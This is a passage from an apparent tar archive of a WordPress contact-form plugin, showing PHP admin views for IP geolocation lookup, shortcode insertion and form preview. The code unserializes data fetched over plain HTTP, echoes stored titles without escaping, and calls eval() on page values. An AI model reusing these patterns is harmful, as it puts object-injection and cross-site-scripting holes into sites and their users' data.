  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function display() {
    $data_ip = ((isset($_GET['data_ip'])) ? esc_html(stripslashes($_GET['data_ip'])) : 0);
    $query = @unserialize(file_get_contents('http://ip-api.com/php/' . $data_ip));
    if ($query && $query['status'] == 'success' && $query['countryCode']) {
      $country_flag = '<img width="16px" src="' .  WD_FMC_URL . '/images/flags/' . strtolower($query['countryCode']) . '.png" class="sub-align" alt="' . $query['country'] . '" title="' . $query['country'] . '" />';
      $country = $query['country'] ;
      $countryCode = $query['countryCode'] ;
      $city = $query['city'];
      $timezone = $query['timezone'];
      $lat = $query['lat'];
      $lon = $query['lon'];
    }
    else {
      $country_flag = '';
      $country = '';
      $countryCode = '';
      $city = '';
      $timezone = '';
      $lat = '';
      $lon = '';
    }
    ?>
    <style>
      .admintable {
        height: 100%;
        margin: 0 auto;
        padding: 0;
        width: 100%;
      }
      table.admintable td.key, table.admintable td.paramlist_key {
        background-color: #F6F6F6;
        border-bottom: 1px solid #E9E9E9;
        border-right: 1px solid #E9E9E9;
        color: #666666;
        font-weight: bold;
        margin-right: 10px;
        text-align: right;
        width: 140px;
      }
    </style>
    <table class="admintable">
      <tr>
        <td class="key"><b>IP:</b></td><td><?php echo $data_ip; ?></td>
      </tr>
      <tr>
        <td class="key"><b>Country:</b></td><td><?php echo $country . ' ' . $country_flag; ?></td>
      </tr>
      <tr>
        <td class="key"><b>CountryCode:</b></td><td><?php echo $countryCode; ?></td>
      </tr>
	    <tr>
        <td class="key"><b>City:</b></td><td><?php echo $city; ?></td>
      </tr>
      <tr>
        <td class="key"><b>Timezone:</b></td><td><?php echo $timezone; ?></td>
      </tr>
      <tr>
        <td class="key"><b>Latitude:</b></td><td><?php echo $lat; ?></td>
      </tr>
      <tr>
        <td class="key"><b>Longitude:</b></td><td><?php echo $lon; ?></td>
      </tr>
    </table>
    <?php
    die();
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/views/FMViewFormcontactwindow.php000060400000036400152434416630014276 0ustar00<?php

class FMViewFormcontactwindow {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  private $model;


  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct($model) {
    $this->model = $model;
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function display() {
    $rows = $this->model->get_form_data();
    ?>
    <html xmlns="http://www.w3.org/1999/xhtml">
      <head>
        <title>Contact Form Maker</title>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <script language="javascript" type="text/javascript" src="<?php echo site_url(); ?>/wp-includes/js/tinymce/tiny_mce_popup.js"></script>
        <script language="javascript" type="text/javascript" src="<?php echo site_url(); ?>/wp-includes/js/tinymce/utils/mctabs.js"></script>
        <script language="javascript" type="text/javascript" src="<?php echo site_url(); ?>/wp-includes/js/tinymce/utils/form_utils.js"></script>

        <?php
        wp_print_scripts('jquery');
        ?>
        <base target="_self">
      </head>
      <body id="link" onLoad="tinyMCEPopup.executeOnLoad('init();');document.body.style.display='';" dir="ltr" class="forceColors">
        <div class="tabs" role="tablist" tabindex="-1">
          <ul>
            <li id="display_tab" class="current" role="tab" tabindex="0">
              <span>
                <a href="javascript:mcTabs.displayTab('display_tab','display_panel');" onMouseDown="return false;" tabindex="-1">Contact Form Maker</a>
              </span>
            </li>
            <li id="submissions_tab" class="" role="tab" tabindex="0">
              <span>
                <a href="javascript:mcTabs.displayTab('submissions_tab','submissions_panel');" onMouseDown="return false;" tabindex="-1">Submissions</a>
              </span>
            </li>
          </ul>
        </div>
        <style>
          .panel_wrapper {
            height: 220px !important;
          }
          .smaller_font {
            font-size: 12px !important;
            vertical-align: middle; 
            text-align: left;
          }
          .smaller_font ul li {
            display: flex !important;
          }
          .smaller_font ul {
            margin: 0 !important;
          }
        </style>
        <div class="panel_wrapper" style="overflow: hidden;">
          <div id="display_panel" class="panel current">
            <table>
              <tr>
                <td style="vertical-align: middle; text-align: left;">Select a Form</td>
                <td style="vertical-align: middle; text-align: left;">
                  <select name="form_maker_id" id="form_maker_id" style="width: 230px; text-align: left;">
                    <option value="- Select Form -" selected="selected">- Select a Form -</option>
                    <?php
                    foreach ($rows as $row) {
                      ?>
                    <option value="<?php echo $row->id; ?>"><?php echo $row->title; ?></option>
                      <?php
                    }
                    ?>
                  </select>
                </td>
              </tr>
            </table>
          </div>
          <div id="submissions_panel" class="panel">
            <div class="error" style="position: relative; padding: 5px; font-size: 20px; color: red; opacity: 1; font-weight: bolder;">Front end submissions are disabled in free version.</div>
            <div style="position: absolute; background: gray; width: 92%; height: 65%; opacity: 0.3;">
            </div>
            <table>
              <tr>
                <td class="smaller_font">Select a Form:</td>
                <td class="smaller_font">
                  <select name="submissions_id" id="submissions_id" style="width: 230px; text-align: left;">
                    <option value="- Select Form -" selected="selected">- Select a Form -</option>
                    <?php
                    foreach ($rows as $row) {
                      ?>
                    <option value="<?php echo $row->id; ?>"><?php echo $row->title; ?></option>
                      <?php
                    }
                    ?>
                  </select>
                </td>
              </tr>
              <tr>
                <td class="smaller_font">Select Date Range:</td>
                <td class="smaller_font">
                  <!--<label style="min-width:30px !important;">From:</label>-->
                  <input class="inputbox" type="text" name="startdate" id="startdate" size="10" maxlength="10" value="" />
                  <input type="reset" style="width: 22px; border-radius: 3px !important;" class="button" value="..." onclick="return showCalendar('startdate','%Y-%m-%d');" />
                  <label style="min-width:30px !important;">To:</label>
                  <input class="inputbox" type="text" name="enddate" id="enddate" size="10" maxlength="10" value="" />
                  <input type="reset" style="width: 22px; border-radius: 3px !important;" class="button" value="..." onclick="return showCalendar('enddate','%Y-%m-%d');" />
                </td>
              </tr>
              <tr>
                <td colspan="2">
                  <table>
                    <tr>
                      <td style="border-right: 1px solid black;">
                        <table>
                          <tr>
                            <td class="smaller_font" style="vertical-align: top;">Select fields:</td>
                            <td class="smaller_font">
                              <ul>
                                <li>
                                  <input type="checkbox" checked="checked" id="submit_date" name="submit_date" value="submit_date">
                                  <label for="submit_date">Submit Date</label>
                                </li>
                                <li>
                                  <input type="checkbox" checked="checked" id="submitter_ip" name="submitter_ip" value="submitter_ip">
                                  <label for="submitter_ip">Submitter's IP Address</label>
                                </li>
                                <li>
                                  <input type="checkbox" checked="checked" id="username" name="username" value="username">
                                  <label for="username">Submitter's Username</label>
                                </li>
                                <li>
                                  <input type="checkbox" checked="checked" id="useremail" name="useremail" value="useremail">
                                  <label for="useremail">Submitter's Email Address</label>
                                </li>
                                <li>
                                  <input type="checkbox" checked="checked" id="form_fields" name="form_fields" value="form_fields">
                                  <label for="form_fields">Form Fields</label>                                  
                                </li>
                                <li><label style="font-size: 10px; width: 160px;">You can hide specific form fields from Form General Options.</label></li>
                              </ul>
                            </td>
                          </tr>
                          <tr>
                            <td class="smaller_font" style="vertical-align: top;">Export to:</td>
                            <td class="smaller_font">
                              <ul>
                                <li>
                                  <input type="checkbox" checked="checked" id="csv" name="csv" value="csv">
                                  <label for="csv">CSV</label>
                                </li>
                                <li>
                                  <input type="checkbox" checked="checked" id="xml" name="xml" value="xml">
                                  <label for="xml">XML</label>
                                </li>
                              </ul>
                            </td>
                          </tr>
                        </table>
                      </td>
                      <td style="vertical-align: top;">
                        <table>
                          <tr>
                            <td class="smaller_font" style="vertical-align: top;">Show:</td>
                            <td class="smaller_font">
                              <ul>
                                <li>
                                  <input type="checkbox" checked="checked" id="title" name="title" value="title">
                                  <label for="title">Title</label>
                                </li>
                                <li>
                                  <input type="checkbox" checked="checked" id="search" name="search" value="search">
                                  <label for="search">Search</label>
                                </li>
                                <li>
                                  <input type="checkbox" checked="checked" id="ordering" name="ordering" value="ordering">
                                  <label for="ordering">Ordering</label>
                                </li>
                                <li>
                                  <input type="checkbox" checked="checked" id="entries" name="entries" value="entries">
                                  <label for="entries">Entries</label>
                                </li>
                                <li>
                                  <input type="checkbox" checked="checked" id="views" name="views" value="views">
                                  <label for="views">Views</label>
                                </li>
                                <li>
                                  <input type="checkbox" checked="checked" id="conversion_rate" name="conversion_rate" value="conversion_rate">
                                  <label for="conversion_rate">Conversion Rate</label>
                                </li>
                                <li>
                                  <input type="checkbox" checked="checked" id="pagination" name="pagination" value="pagination">
                                  <label for="pagination">Pagination</label>
                                </li>
                                <li>
                                  <input type="checkbox" checked="checked" id="stats" name="stats" value="stats">
                                  <label for="stats">Statistics</label>
                                </li>
                              </ul>
                            </td>
                          </tr>
                        </table>
                      </td>
                    </tr>
                  </table>
                </td>
              </tr>
            </table>
          </div>
        </div>
        <div class="mceActionPanel">
          <div style="float: left;">
            <input type="button" id="cancel" name="cancel" value="Cancel" onClick="tinyMCEPopup.close();"/>
          </div>
          <div style="float: right;">
            <input type="submit" id="insert" name="insert" value="Insert" onClick="form_maker_insert_shortcode();"/>
          </div>
        </div>
        <script type="text/javascript">
          var short_code = get_params("wd_contact_form");
          if (short_code) {
            if (!short_code['type']) {
              document.getElementById("form_maker_id").value = short_code['id'];
            }
          }
          // Get shortcodes attributes.
          function get_params(module_name) {
            var selected_text = tinyMCE.activeEditor.selection.getContent();
            var module_start_index = selected_text.indexOf("[" + module_name);
            var module_end_index = selected_text.indexOf("]", module_start_index);
            var module_str = "";
            if ((module_start_index == 0) && (module_end_index > 0)) {
              module_str = selected_text.substring(module_start_index + 1, module_end_index);
            }
            else {
              return false;
            }
            var params_str = module_str.substring(module_str.indexOf(" ") + 1);
            var key_values = params_str.split(" ");
            var short_code_attr = new Array();
            for (var key in key_values) {
              var short_code_index = key_values[key].split('=')[0];
              var short_code_value = key_values[key].split('=')[1];
              short_code_value = short_code_value.substring(1, short_code_value.length - 1);
              short_code_attr[short_code_index] = short_code_value;
            }
            return short_code_attr;
          }
          function form_maker_insert_shortcode() {
            if (document.getElementById('display_panel').className !== 'panel') {
              if (document.getElementById('form_maker_id').value == '- Select Form -') {
                tinyMCEPopup.close();
              }
              else {
                var tagtext;
              tagtext = '[wd_contact_form id="' + document.getElementById('form_maker_id').value + '"]';
                window.tinyMCE.execCommand('mceInsertContent', false, tagtext);
                tinyMCEPopup.close();
              }
            }            
            else {
              alert("Front end submissions are disabled in free version.");
            }
          }
        </script>
      </body>
    </html>
    <?php
    die();
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/views/FMViewFormMakerPreview_fmc.php000060400000064160152434416630014645 0ustar00<?php

class FMViewFormMakerPreview_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  private $model;


  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct($model) {
    $this->model = $model;
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function display() {
    $form_id = ((isset($_GET['form_id'])) ? esc_html(stripslashes($_GET['form_id'])) : 0);
    $form = (($form_id) ? $this->model->get_form($form_id) : '');
    wp_print_scripts('jquery');
    wp_print_scripts('jquery-ui-widget');
    wp_print_scripts('jquery-ui-slider');
    wp_print_scripts('jquery-ui-spinner');
	$fmc_settings = get_option('fmc_settings');
	$map_key = isset($fmc_settings['map_key']) ? $fmc_settings['map_key'] : '';
    ?>
    <script src="https://maps.google.com/maps/api/js?v=3.exp&key=<?php echo $map_key ?>" type="text/javascript"></script>
    <script src="<?php echo WD_FMC_URL . '/js/if_gmap_front_end.js'; ?>" type="text/javascript"></script>
    <script src="<?php echo WD_FMC_URL . '/js/calendar/calendar.js'; ?>" type="text/javascript"></script>
    <script src="<?php echo WD_FMC_URL . '/js/calendar/calendar_function.js'; ?>" type="text/javascript"></script>
    <link media="all" type="text/css" href="<?php echo WD_FMC_URL . '/css/calendar-jos.css'; ?>" rel="stylesheet">
    <link media="all" type="text/css" href="<?php echo WD_FMC_URL . '/css/jquery-ui-1.10.3.custom.css'; ?>" rel="stylesheet">
    <link media="all" type="text/css" href="<?php echo WD_FMC_URL . '/css/jquery-ui-spinner.css'; ?>" rel="stylesheet">
    <?php
    if (isset($_GET['test_theme'])) {
      wp_print_scripts('jquery-effects-shake');
      wp_register_script('main_div_front_end', WD_FMC_URL . '/js/main_div_front_end.js', array(), get_option("wd_form_maker_version"));
      $theme_id = esc_html(stripslashes($_GET['test_theme']));
      require_once (WD_FMC_DIR . '/frontend/controllers/FMControllerForm_maker_fmc.php');
      $controller = new FMControllerForm_maker_fmc();
      echo $controller->execute($form_id, $theme_id);
      die();
    }
    $theme_id = ((isset($_GET['id'])) ? esc_html(stripslashes($_GET['id'])) : '');
    $css = $this->model->get_theme_css($theme_id);
    $id = 'form_id_temp';
    ?>
    <script src="<?php echo WD_FMC_URL . '/js/main_front_end.js'; ?>"></script>
    <style>
      <?php
      echo str_replace('[SITE_ROOT]', WD_FMC_URL, $css);
      ?>
    </style>
    <div id="form_id_temppages" class="wdform_page_navigation" show_title="" show_numbers="" type=""></div>
    <form id="form_preview"><?php echo $form; ?></form>
    <?php
    if ($form) { // Preview from options page.
      die();
    }
    ?>
    <input type="hidden" id="counter<?php echo $id; ?>" value="" name="counter<?php echo $id; ?>" />
    <script>
      var plugin_url = "<?php echo WD_FMC_URL; ?>";
      /*JURI_ROOT = '<?php echo WD_FMC_URL . '/js' ?>';*/
      document.getElementById('form_preview').innerHTML = window.parent.document.getElementById('take').innerHTML;
      document.getElementById('form_id_temppages').setAttribute('show_title', window.parent.document.getElementById('pages').getAttribute('show_title'));
      document.getElementById('form_id_temppages').setAttribute('show_numbers', window.parent.document.getElementById('pages').getAttribute('show_numbers'));
      document.getElementById('form_id_temppages').setAttribute('type', window.parent.document.getElementById('pages').getAttribute('type'));
      document.getElementById('counterform_id_temp').value = window.parent.gen;
      form_view_count<?php echo $id ?>= 0;
      for (i = 1; i <= 30; i++) {
        if (document.getElementById('<?php echo $id ?>form_view' + i)) {
          form_view_count<?php echo $id ?>++;
          form_view_max<?php echo $id ?>= i;
          document.getElementById('<?php echo $id ?>form_view' + i).parentNode.removeAttribute('style');
        }
      }
      refresh_first();
      if (form_view_count<?php echo $id ?>> 1) {
        for (i = 1; i <= form_view_max<?php echo $id ?>; i++) {
          if (document.getElementById('<?php echo $id ?>form_view' + i)) {
            first_form_view<?php echo $id ?>= i;
            break;
          }
        }
        generate_page_nav(first_form_view<?php echo $id ?>, '<?php echo $id ?>', form_view_count<?php echo $id ?>, form_view_max<?php echo $id ?>);
      }
      function remove_add_(id) {
        attr_name = new Array();
        attr_value = new Array();
        var input = document.getElementById(id);
        atr = input.attributes;
        for (v = 0; v < 30; v++)
          if (atr[v]) {
            if (atr[v].name.indexOf("add_") == 0) {
              attr_name.push(atr[v].name.replace('add_', ''));
              attr_value.push(atr[v].value);
              input.removeAttribute(atr[v].name);
              v--;
            }
          }
        for (v = 0; v < attr_name.length; v++) {
          input.setAttribute(attr_name[v], attr_value[v])
        }
      }
      function refresh_first() {
        n = window.parent.gen;
        for (i = 0; i < n; i++) {
          if (document.getElementById(i)) {
            for (z = 0; z < document.getElementById(i).childNodes.length; z++) {
              if (document.getElementById(i).childNodes[z].nodeType == 3) {
                document.getElementById(i).removeChild(document.getElementById(i).childNodes[z]);
              }
            }
            if (document.getElementById(i).getAttribute('type') == "type_map") {
              if_gmap_init(i);
              for (q = 0; q < 20; q++) {
                if (document.getElementById(i + "_elementform_id_temp").getAttribute("long" + q)) {
                  w_long = parseFloat(document.getElementById(i + "_elementform_id_temp").getAttribute("long" + q));
                  w_lat = parseFloat(document.getElementById(i + "_elementform_id_temp").getAttribute("lat" + q));
                  w_info = parseFloat(document.getElementById(i + "_elementform_id_temp").getAttribute("info" + q));
                  add_marker_on_map(i, q, w_long, w_lat, w_info, false);
                }
              }
            }
            if (document.getElementById(i).getAttribute('type') == "type_mark_map") {
              if_gmap_init(i);
              w_long = parseFloat(document.getElementById(i + "_elementform_id_temp").getAttribute("long" + 0));
              w_lat = parseFloat(document.getElementById(i + "_elementform_id_temp").getAttribute("lat" + 0));
              w_info = parseFloat(document.getElementById(i + "_elementform_id_temp").getAttribute("info" + 0));
              add_marker_on_map(i, 0, w_long, w_lat, w_info, true);
            }
            if (document.getElementById(i).getAttribute('type') == "type_captcha" || document.getElementById(i).getAttribute('type') == "type_recaptcha") {
              if (document.getElementById(i).childNodes[10]) {
                document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
                document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
                document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
                document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
                document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
                document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
                document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
                document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
                document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
              }
              else {
                document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
                document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
                document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
                document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
                document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
                document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
                document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
                document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
                document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
              }
              continue;
            }
            if (document.getElementById(i).getAttribute('type') == "type_section_break") {
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
              continue;
            }
            if (document.getElementById(i).childNodes[10]) {
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[2]);
            }
            else {
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
              document.getElementById(i).removeChild(document.getElementById(i).childNodes[1]);
            }
          }
        }
        for (i = 0; i <= n; i++) {
          if (document.getElementById(i)) {
            type = document.getElementById(i).getAttribute("type");
            switch (type) {
              case "type_text":
              case "type_number":
              case "type_password":
              case "type_submitter_mail":
              case "type_own_select":
              case "type_country":
              case "type_hidden":
              case "type_map": {
                remove_add_(i + "_elementform_id_temp");
                break;
              }
              case "type_submit_reset": {
                remove_add_(i + "_element_submitform_id_temp");
                if (document.getElementById(i + "_element_resetform_id_temp")) {
                  remove_add_(i + "_element_resetform_id_temp");
                }
                break;
              }

              case "type_captcha": {
                remove_add_("_wd_captchaform_id_temp");
                remove_add_("_element_refreshform_id_temp");
                remove_add_("_wd_captcha_inputform_id_temp");
                break;
              }
              case "type_recaptcha": {
                remove_add_("wd_recaptchaform_id_temp");
                break;
              }
              case "type_file_upload": {
                remove_add_(i + "_elementform_id_temp");
                break;
              }
              case "type_textarea": {
                remove_add_(i + "_elementform_id_temp");
                break;
              }
              case "type_name": {
                if (document.getElementById(i + "_element_titleform_id_temp")) {
                  remove_add_(i + "_element_titleform_id_temp");
                  remove_add_(i + "_element_firstform_id_temp");
                  remove_add_(i + "_element_lastform_id_temp");
                  remove_add_(i + "_element_middleform_id_temp");
                }
                else {
                  remove_add_(i + "_element_firstform_id_temp");
                  remove_add_(i + "_element_lastform_id_temp");

                }
                break;
              }
              case "type_phone": {
                remove_add_(i + "_element_firstform_id_temp");
                remove_add_(i + "_element_lastform_id_temp");
                break;
              }
              case "type_address": {
                if(document.getElementById(i+"_disable_fieldsform_id_temp").getAttribute('street1')=='no')
                  remove_add_(i+"_street1form_id_temp");
                if(document.getElementById(i+"_disable_fieldsform_id_temp").getAttribute('street2')=='no')	
                  remove_add_(i+"_street2form_id_temp");
                if(document.getElementById(i+"_disable_fieldsform_id_temp").getAttribute('city')=='no')
                  remove_add_(i+"_cityform_id_temp");
                if(document.getElementById(i+"_disable_fieldsform_id_temp").getAttribute('state')=='no')
                  remove_add_(i+"_stateform_id_temp");
                if(document.getElementById(i+"_disable_fieldsform_id_temp").getAttribute('postal')=='no')
                  remove_add_(i+"_postalform_id_temp");
                if(document.getElementById(i+"_disable_fieldsform_id_temp").getAttribute('country')=='no')
                  remove_add_(i+"_countryform_id_temp");
                break;
              }
              case "type_checkbox":
              case "type_radio": {
                is = true;
                for (j = 0; j < 100; j++) {
                  if (document.getElementById(i + "_elementform_id_temp" + j)) {
                    remove_add_(i + "_elementform_id_temp" + j);
                  }
                }
                break;
              }
              case "type_button": {
                for (j = 0; j < 100; j++) {
                  if (document.getElementById(i + "_elementform_id_temp" + j)) {
                    remove_add_(i + "_elementform_id_temp" + j);
                  }
                }
                break;
              }
              case "type_time": {
                if (document.getElementById(i + "_ssform_id_temp")) {
                  remove_add_(i + "_ssform_id_temp");
                  remove_add_(i + "_mmform_id_temp");
                  remove_add_(i + "_hhform_id_temp");
                }
                else {
                  remove_add_(i + "_mmform_id_temp");
                  remove_add_(i + "_hhform_id_temp");
                }
                break;
              }
              case "type_date": {
                remove_add_(i + "_elementform_id_temp");
                remove_add_(i + "_buttonform_id_temp");
                break;
              }
              case "type_date_fields": {
                remove_add_(i + "_dayform_id_temp");
                remove_add_(i + "_monthform_id_temp");
                remove_add_(i + "_yearform_id_temp");
                break;
              }
              case "type_star_rating": {	
                remove_add_(i+"_elementform_id_temp");
                break;
              }
              case "type_scale_rating": {	
                remove_add_(i+"_elementform_id_temp");
                break;
              }
              case "type_spinner": {
                remove_add_(i+"_elementform_id_temp");
                var spinner_value = document.getElementById(i+"_elementform_id_temp").getAttribute( "aria-valuenow" );
                var spinner_min_value = document.getElementById(i+"_min_valueform_id_temp").value;
                var spinner_max_value = document.getElementById(i+"_max_valueform_id_temp").value;
                var spinner_step = document.getElementById(i+"_stepform_id_temp").value;
                jQuery( "#"+i+"_elementform_id_temp" ).removeClass( "ui-spinner-input" )
                  .prop( "disabled", false )
                  .removeAttr( "autocomplete" )
                  .removeAttr( "role" )
                  .removeAttr( "aria-valuemin" )
                  .removeAttr( "aria-valuemax" )
                  .removeAttr( "aria-valuenow" );
                span_ui= document.getElementById(i+"_elementform_id_temp").parentNode;
                span_ui.parentNode.appendChild(document.getElementById(i+"_elementform_id_temp"));
                span_ui.parentNode.removeChild(span_ui);
                jQuery("#"+i+"_elementform_id_temp")[0].spin = null;
                spinner = jQuery( "#"+i+"_elementform_id_temp" ).spinner();
                spinner.spinner( "value", spinner_value );
                jQuery( "#"+i+"_elementform_id_temp" ).spinner({ min: spinner_min_value});    
                jQuery( "#"+i+"_elementform_id_temp" ).spinner({ max: spinner_max_value});
                jQuery( "#"+i+"_elementform_id_temp" ).spinner({ step: spinner_step});
                break;
              }
              case "type_slider": {	
                remove_add_(i+"_elementform_id_temp");	
                var slider_value = document.getElementById(i+"_slider_valueform_id_temp").value;
                var slider_min_value = document.getElementById(i+"_slider_min_valueform_id_temp").value;
                var slider_max_value = document.getElementById(i+"_slider_max_valueform_id_temp").value;
                var slider_element_value = document.getElementById( i+"_element_valueform_id_temp" );
                var slider_value_save = document.getElementById( i+"_slider_valueform_id_temp" );
                document.getElementById(i+"_elementform_id_temp").innerHTML = "";
                document.getElementById(i+"_elementform_id_temp").removeAttribute( "class" );
                document.getElementById(i+"_elementform_id_temp").removeAttribute( "aria-disabled" );
                jQuery("#"+i+"_elementform_id_temp")[0].slide = null;	
                jQuery( "#"+i+"_elementform_id_temp").slider({
                  range: "min",
                  value: eval(slider_value),
                  min: eval(slider_min_value),
                  max: eval(slider_max_value),
                  slide: function( event, ui ) {	
                    slider_element_value.innerHTML = "" + ui.value ;
                    slider_value_save.value = "" + ui.value; 

                  }
                });
                break;
              }
              case "type_range": {	
                remove_add_(i+"_elementform_id_temp0");
                remove_add_(i+"_elementform_id_temp1");
                var spinner_value0 = document.getElementById(i+"_elementform_id_temp0").getAttribute( "aria-valuenow" );
                var spinner_step = document.getElementById(i+"_range_stepform_id_temp").value;
                jQuery( "#"+i+"_elementform_id_temp0" ).removeClass( "ui-spinner-input" )
                  .prop( "disabled", false )
                  .removeAttr( "autocomplete" )
                  .removeAttr( "role" )
                  .removeAttr( "aria-valuenow" );
                span_ui= document.getElementById(i+"_elementform_id_temp0").parentNode;
                span_ui.parentNode.appendChild(document.getElementById(i+"_elementform_id_temp0"));
                span_ui.parentNode.removeChild(span_ui);
                jQuery("#"+i+"_elementform_id_temp0")[0].spin = null;
                jQuery("#"+i+"_elementform_id_temp1")[0].spin = null;
                spinner0 = jQuery( "#"+i+"_elementform_id_temp0" ).spinner();
                spinner0.spinner( "value", spinner_value0 );
                jQuery( "#"+i+"_elementform_id_temp0" ).spinner({ step: spinner_step});
                var spinner_value1 = document.getElementById(i+"_elementform_id_temp1").getAttribute( "aria-valuenow" );
                jQuery( "#"+i+"_elementform_id_temp1" ).removeClass( "ui-spinner-input" )
                  .prop( "disabled", false )
                  .removeAttr( "autocomplete" )
                  .removeAttr( "role" )
                  .removeAttr( "aria-valuenow" );
                span_ui1= document.getElementById(i+"_elementform_id_temp1").parentNode;
                span_ui1.parentNode.appendChild(document.getElementById(i+"_elementform_id_temp1"));
                span_ui1.parentNode.removeChild(span_ui1);
                spinner1 = jQuery( "#"+i+"_elementform_id_temp1" ).spinner();
                spinner1.spinner( "value", spinner_value1 );
                jQuery( "#"+i+"_elementform_id_temp1" ).spinner({ step: spinner_step});
                break;
              }
              case "type_grading": {
                for (k=0; k<100; k++) {
                  if (document.getElementById(i+"_elementform_id_temp"+k)) {
                    remove_add_(i+"_elementform_id_temp"+k);
                  }
                }
                break;
              }                
              case "type_matrix": {
                remove_add_(i+"_elementform_id_temp");
                break;
              }
            }
          }
        }
        for (t = 1; t <= form_view_max<?php echo $id ?>; t++) {
          if (document.getElementById('form_id_tempform_view' + t)) {
            form_view_element = document.getElementById('form_id_tempform_view' + t);
            remove_whitespace(form_view_element);
            xy = form_view_element.childNodes.length - 2;
            for (z = 0; z <= xy; z++) {
              if (form_view_element.childNodes[z]) {
                if (form_view_element.childNodes[z].nodeType != 3) {
                  if (!form_view_element.childNodes[z].id) {
                    del = true;
                    GLOBAL_tr = form_view_element.childNodes[z];
                    //////////////////////////////////////////////////////////////////////////////////////////
                    for (x = 0; x < GLOBAL_tr.firstChild.childNodes.length; x++) {
                      table = GLOBAL_tr.firstChild.childNodes[x];
                      tbody = table.firstChild;
                      if (tbody.childNodes.length) {
                        del = false;
                      }
                    }
                    if (del) {
                      form_view_element.removeChild(form_view_element.childNodes[z]);
                    }
                  }
                }
              }
            }
          }
        }
        for (i = 1; i <= window.parent.form_view_max; i++) {
          if (document.getElementById('form_id_tempform_view' + i)) {
            document.getElementById('form_id_tempform_view' + i).parentNode.removeChild(document.getElementById('form_id_tempform_view_img' + i));
            document.getElementById('form_id_tempform_view' + i).removeAttribute('style');
          }
        }
      }
      function remove_whitespace(node) {
        var ttt;
        for (ttt = 0; ttt < node.childNodes.length; ttt++) {
          if (node.childNodes[ttt] && node.childNodes[ttt].nodeType == '3' && !/\S/.test(node.childNodes[ttt].nodeValue)) {
            node.removeChild(node.childNodes[ttt]);
            ttt--;
          }
          else {
            if (node.childNodes[ttt].childNodes.length) {
              remove_whitespace(node.childNodes[ttt]);
            }
          }
        }
        return;
      }
    </script>
    <?php
    die();
  }
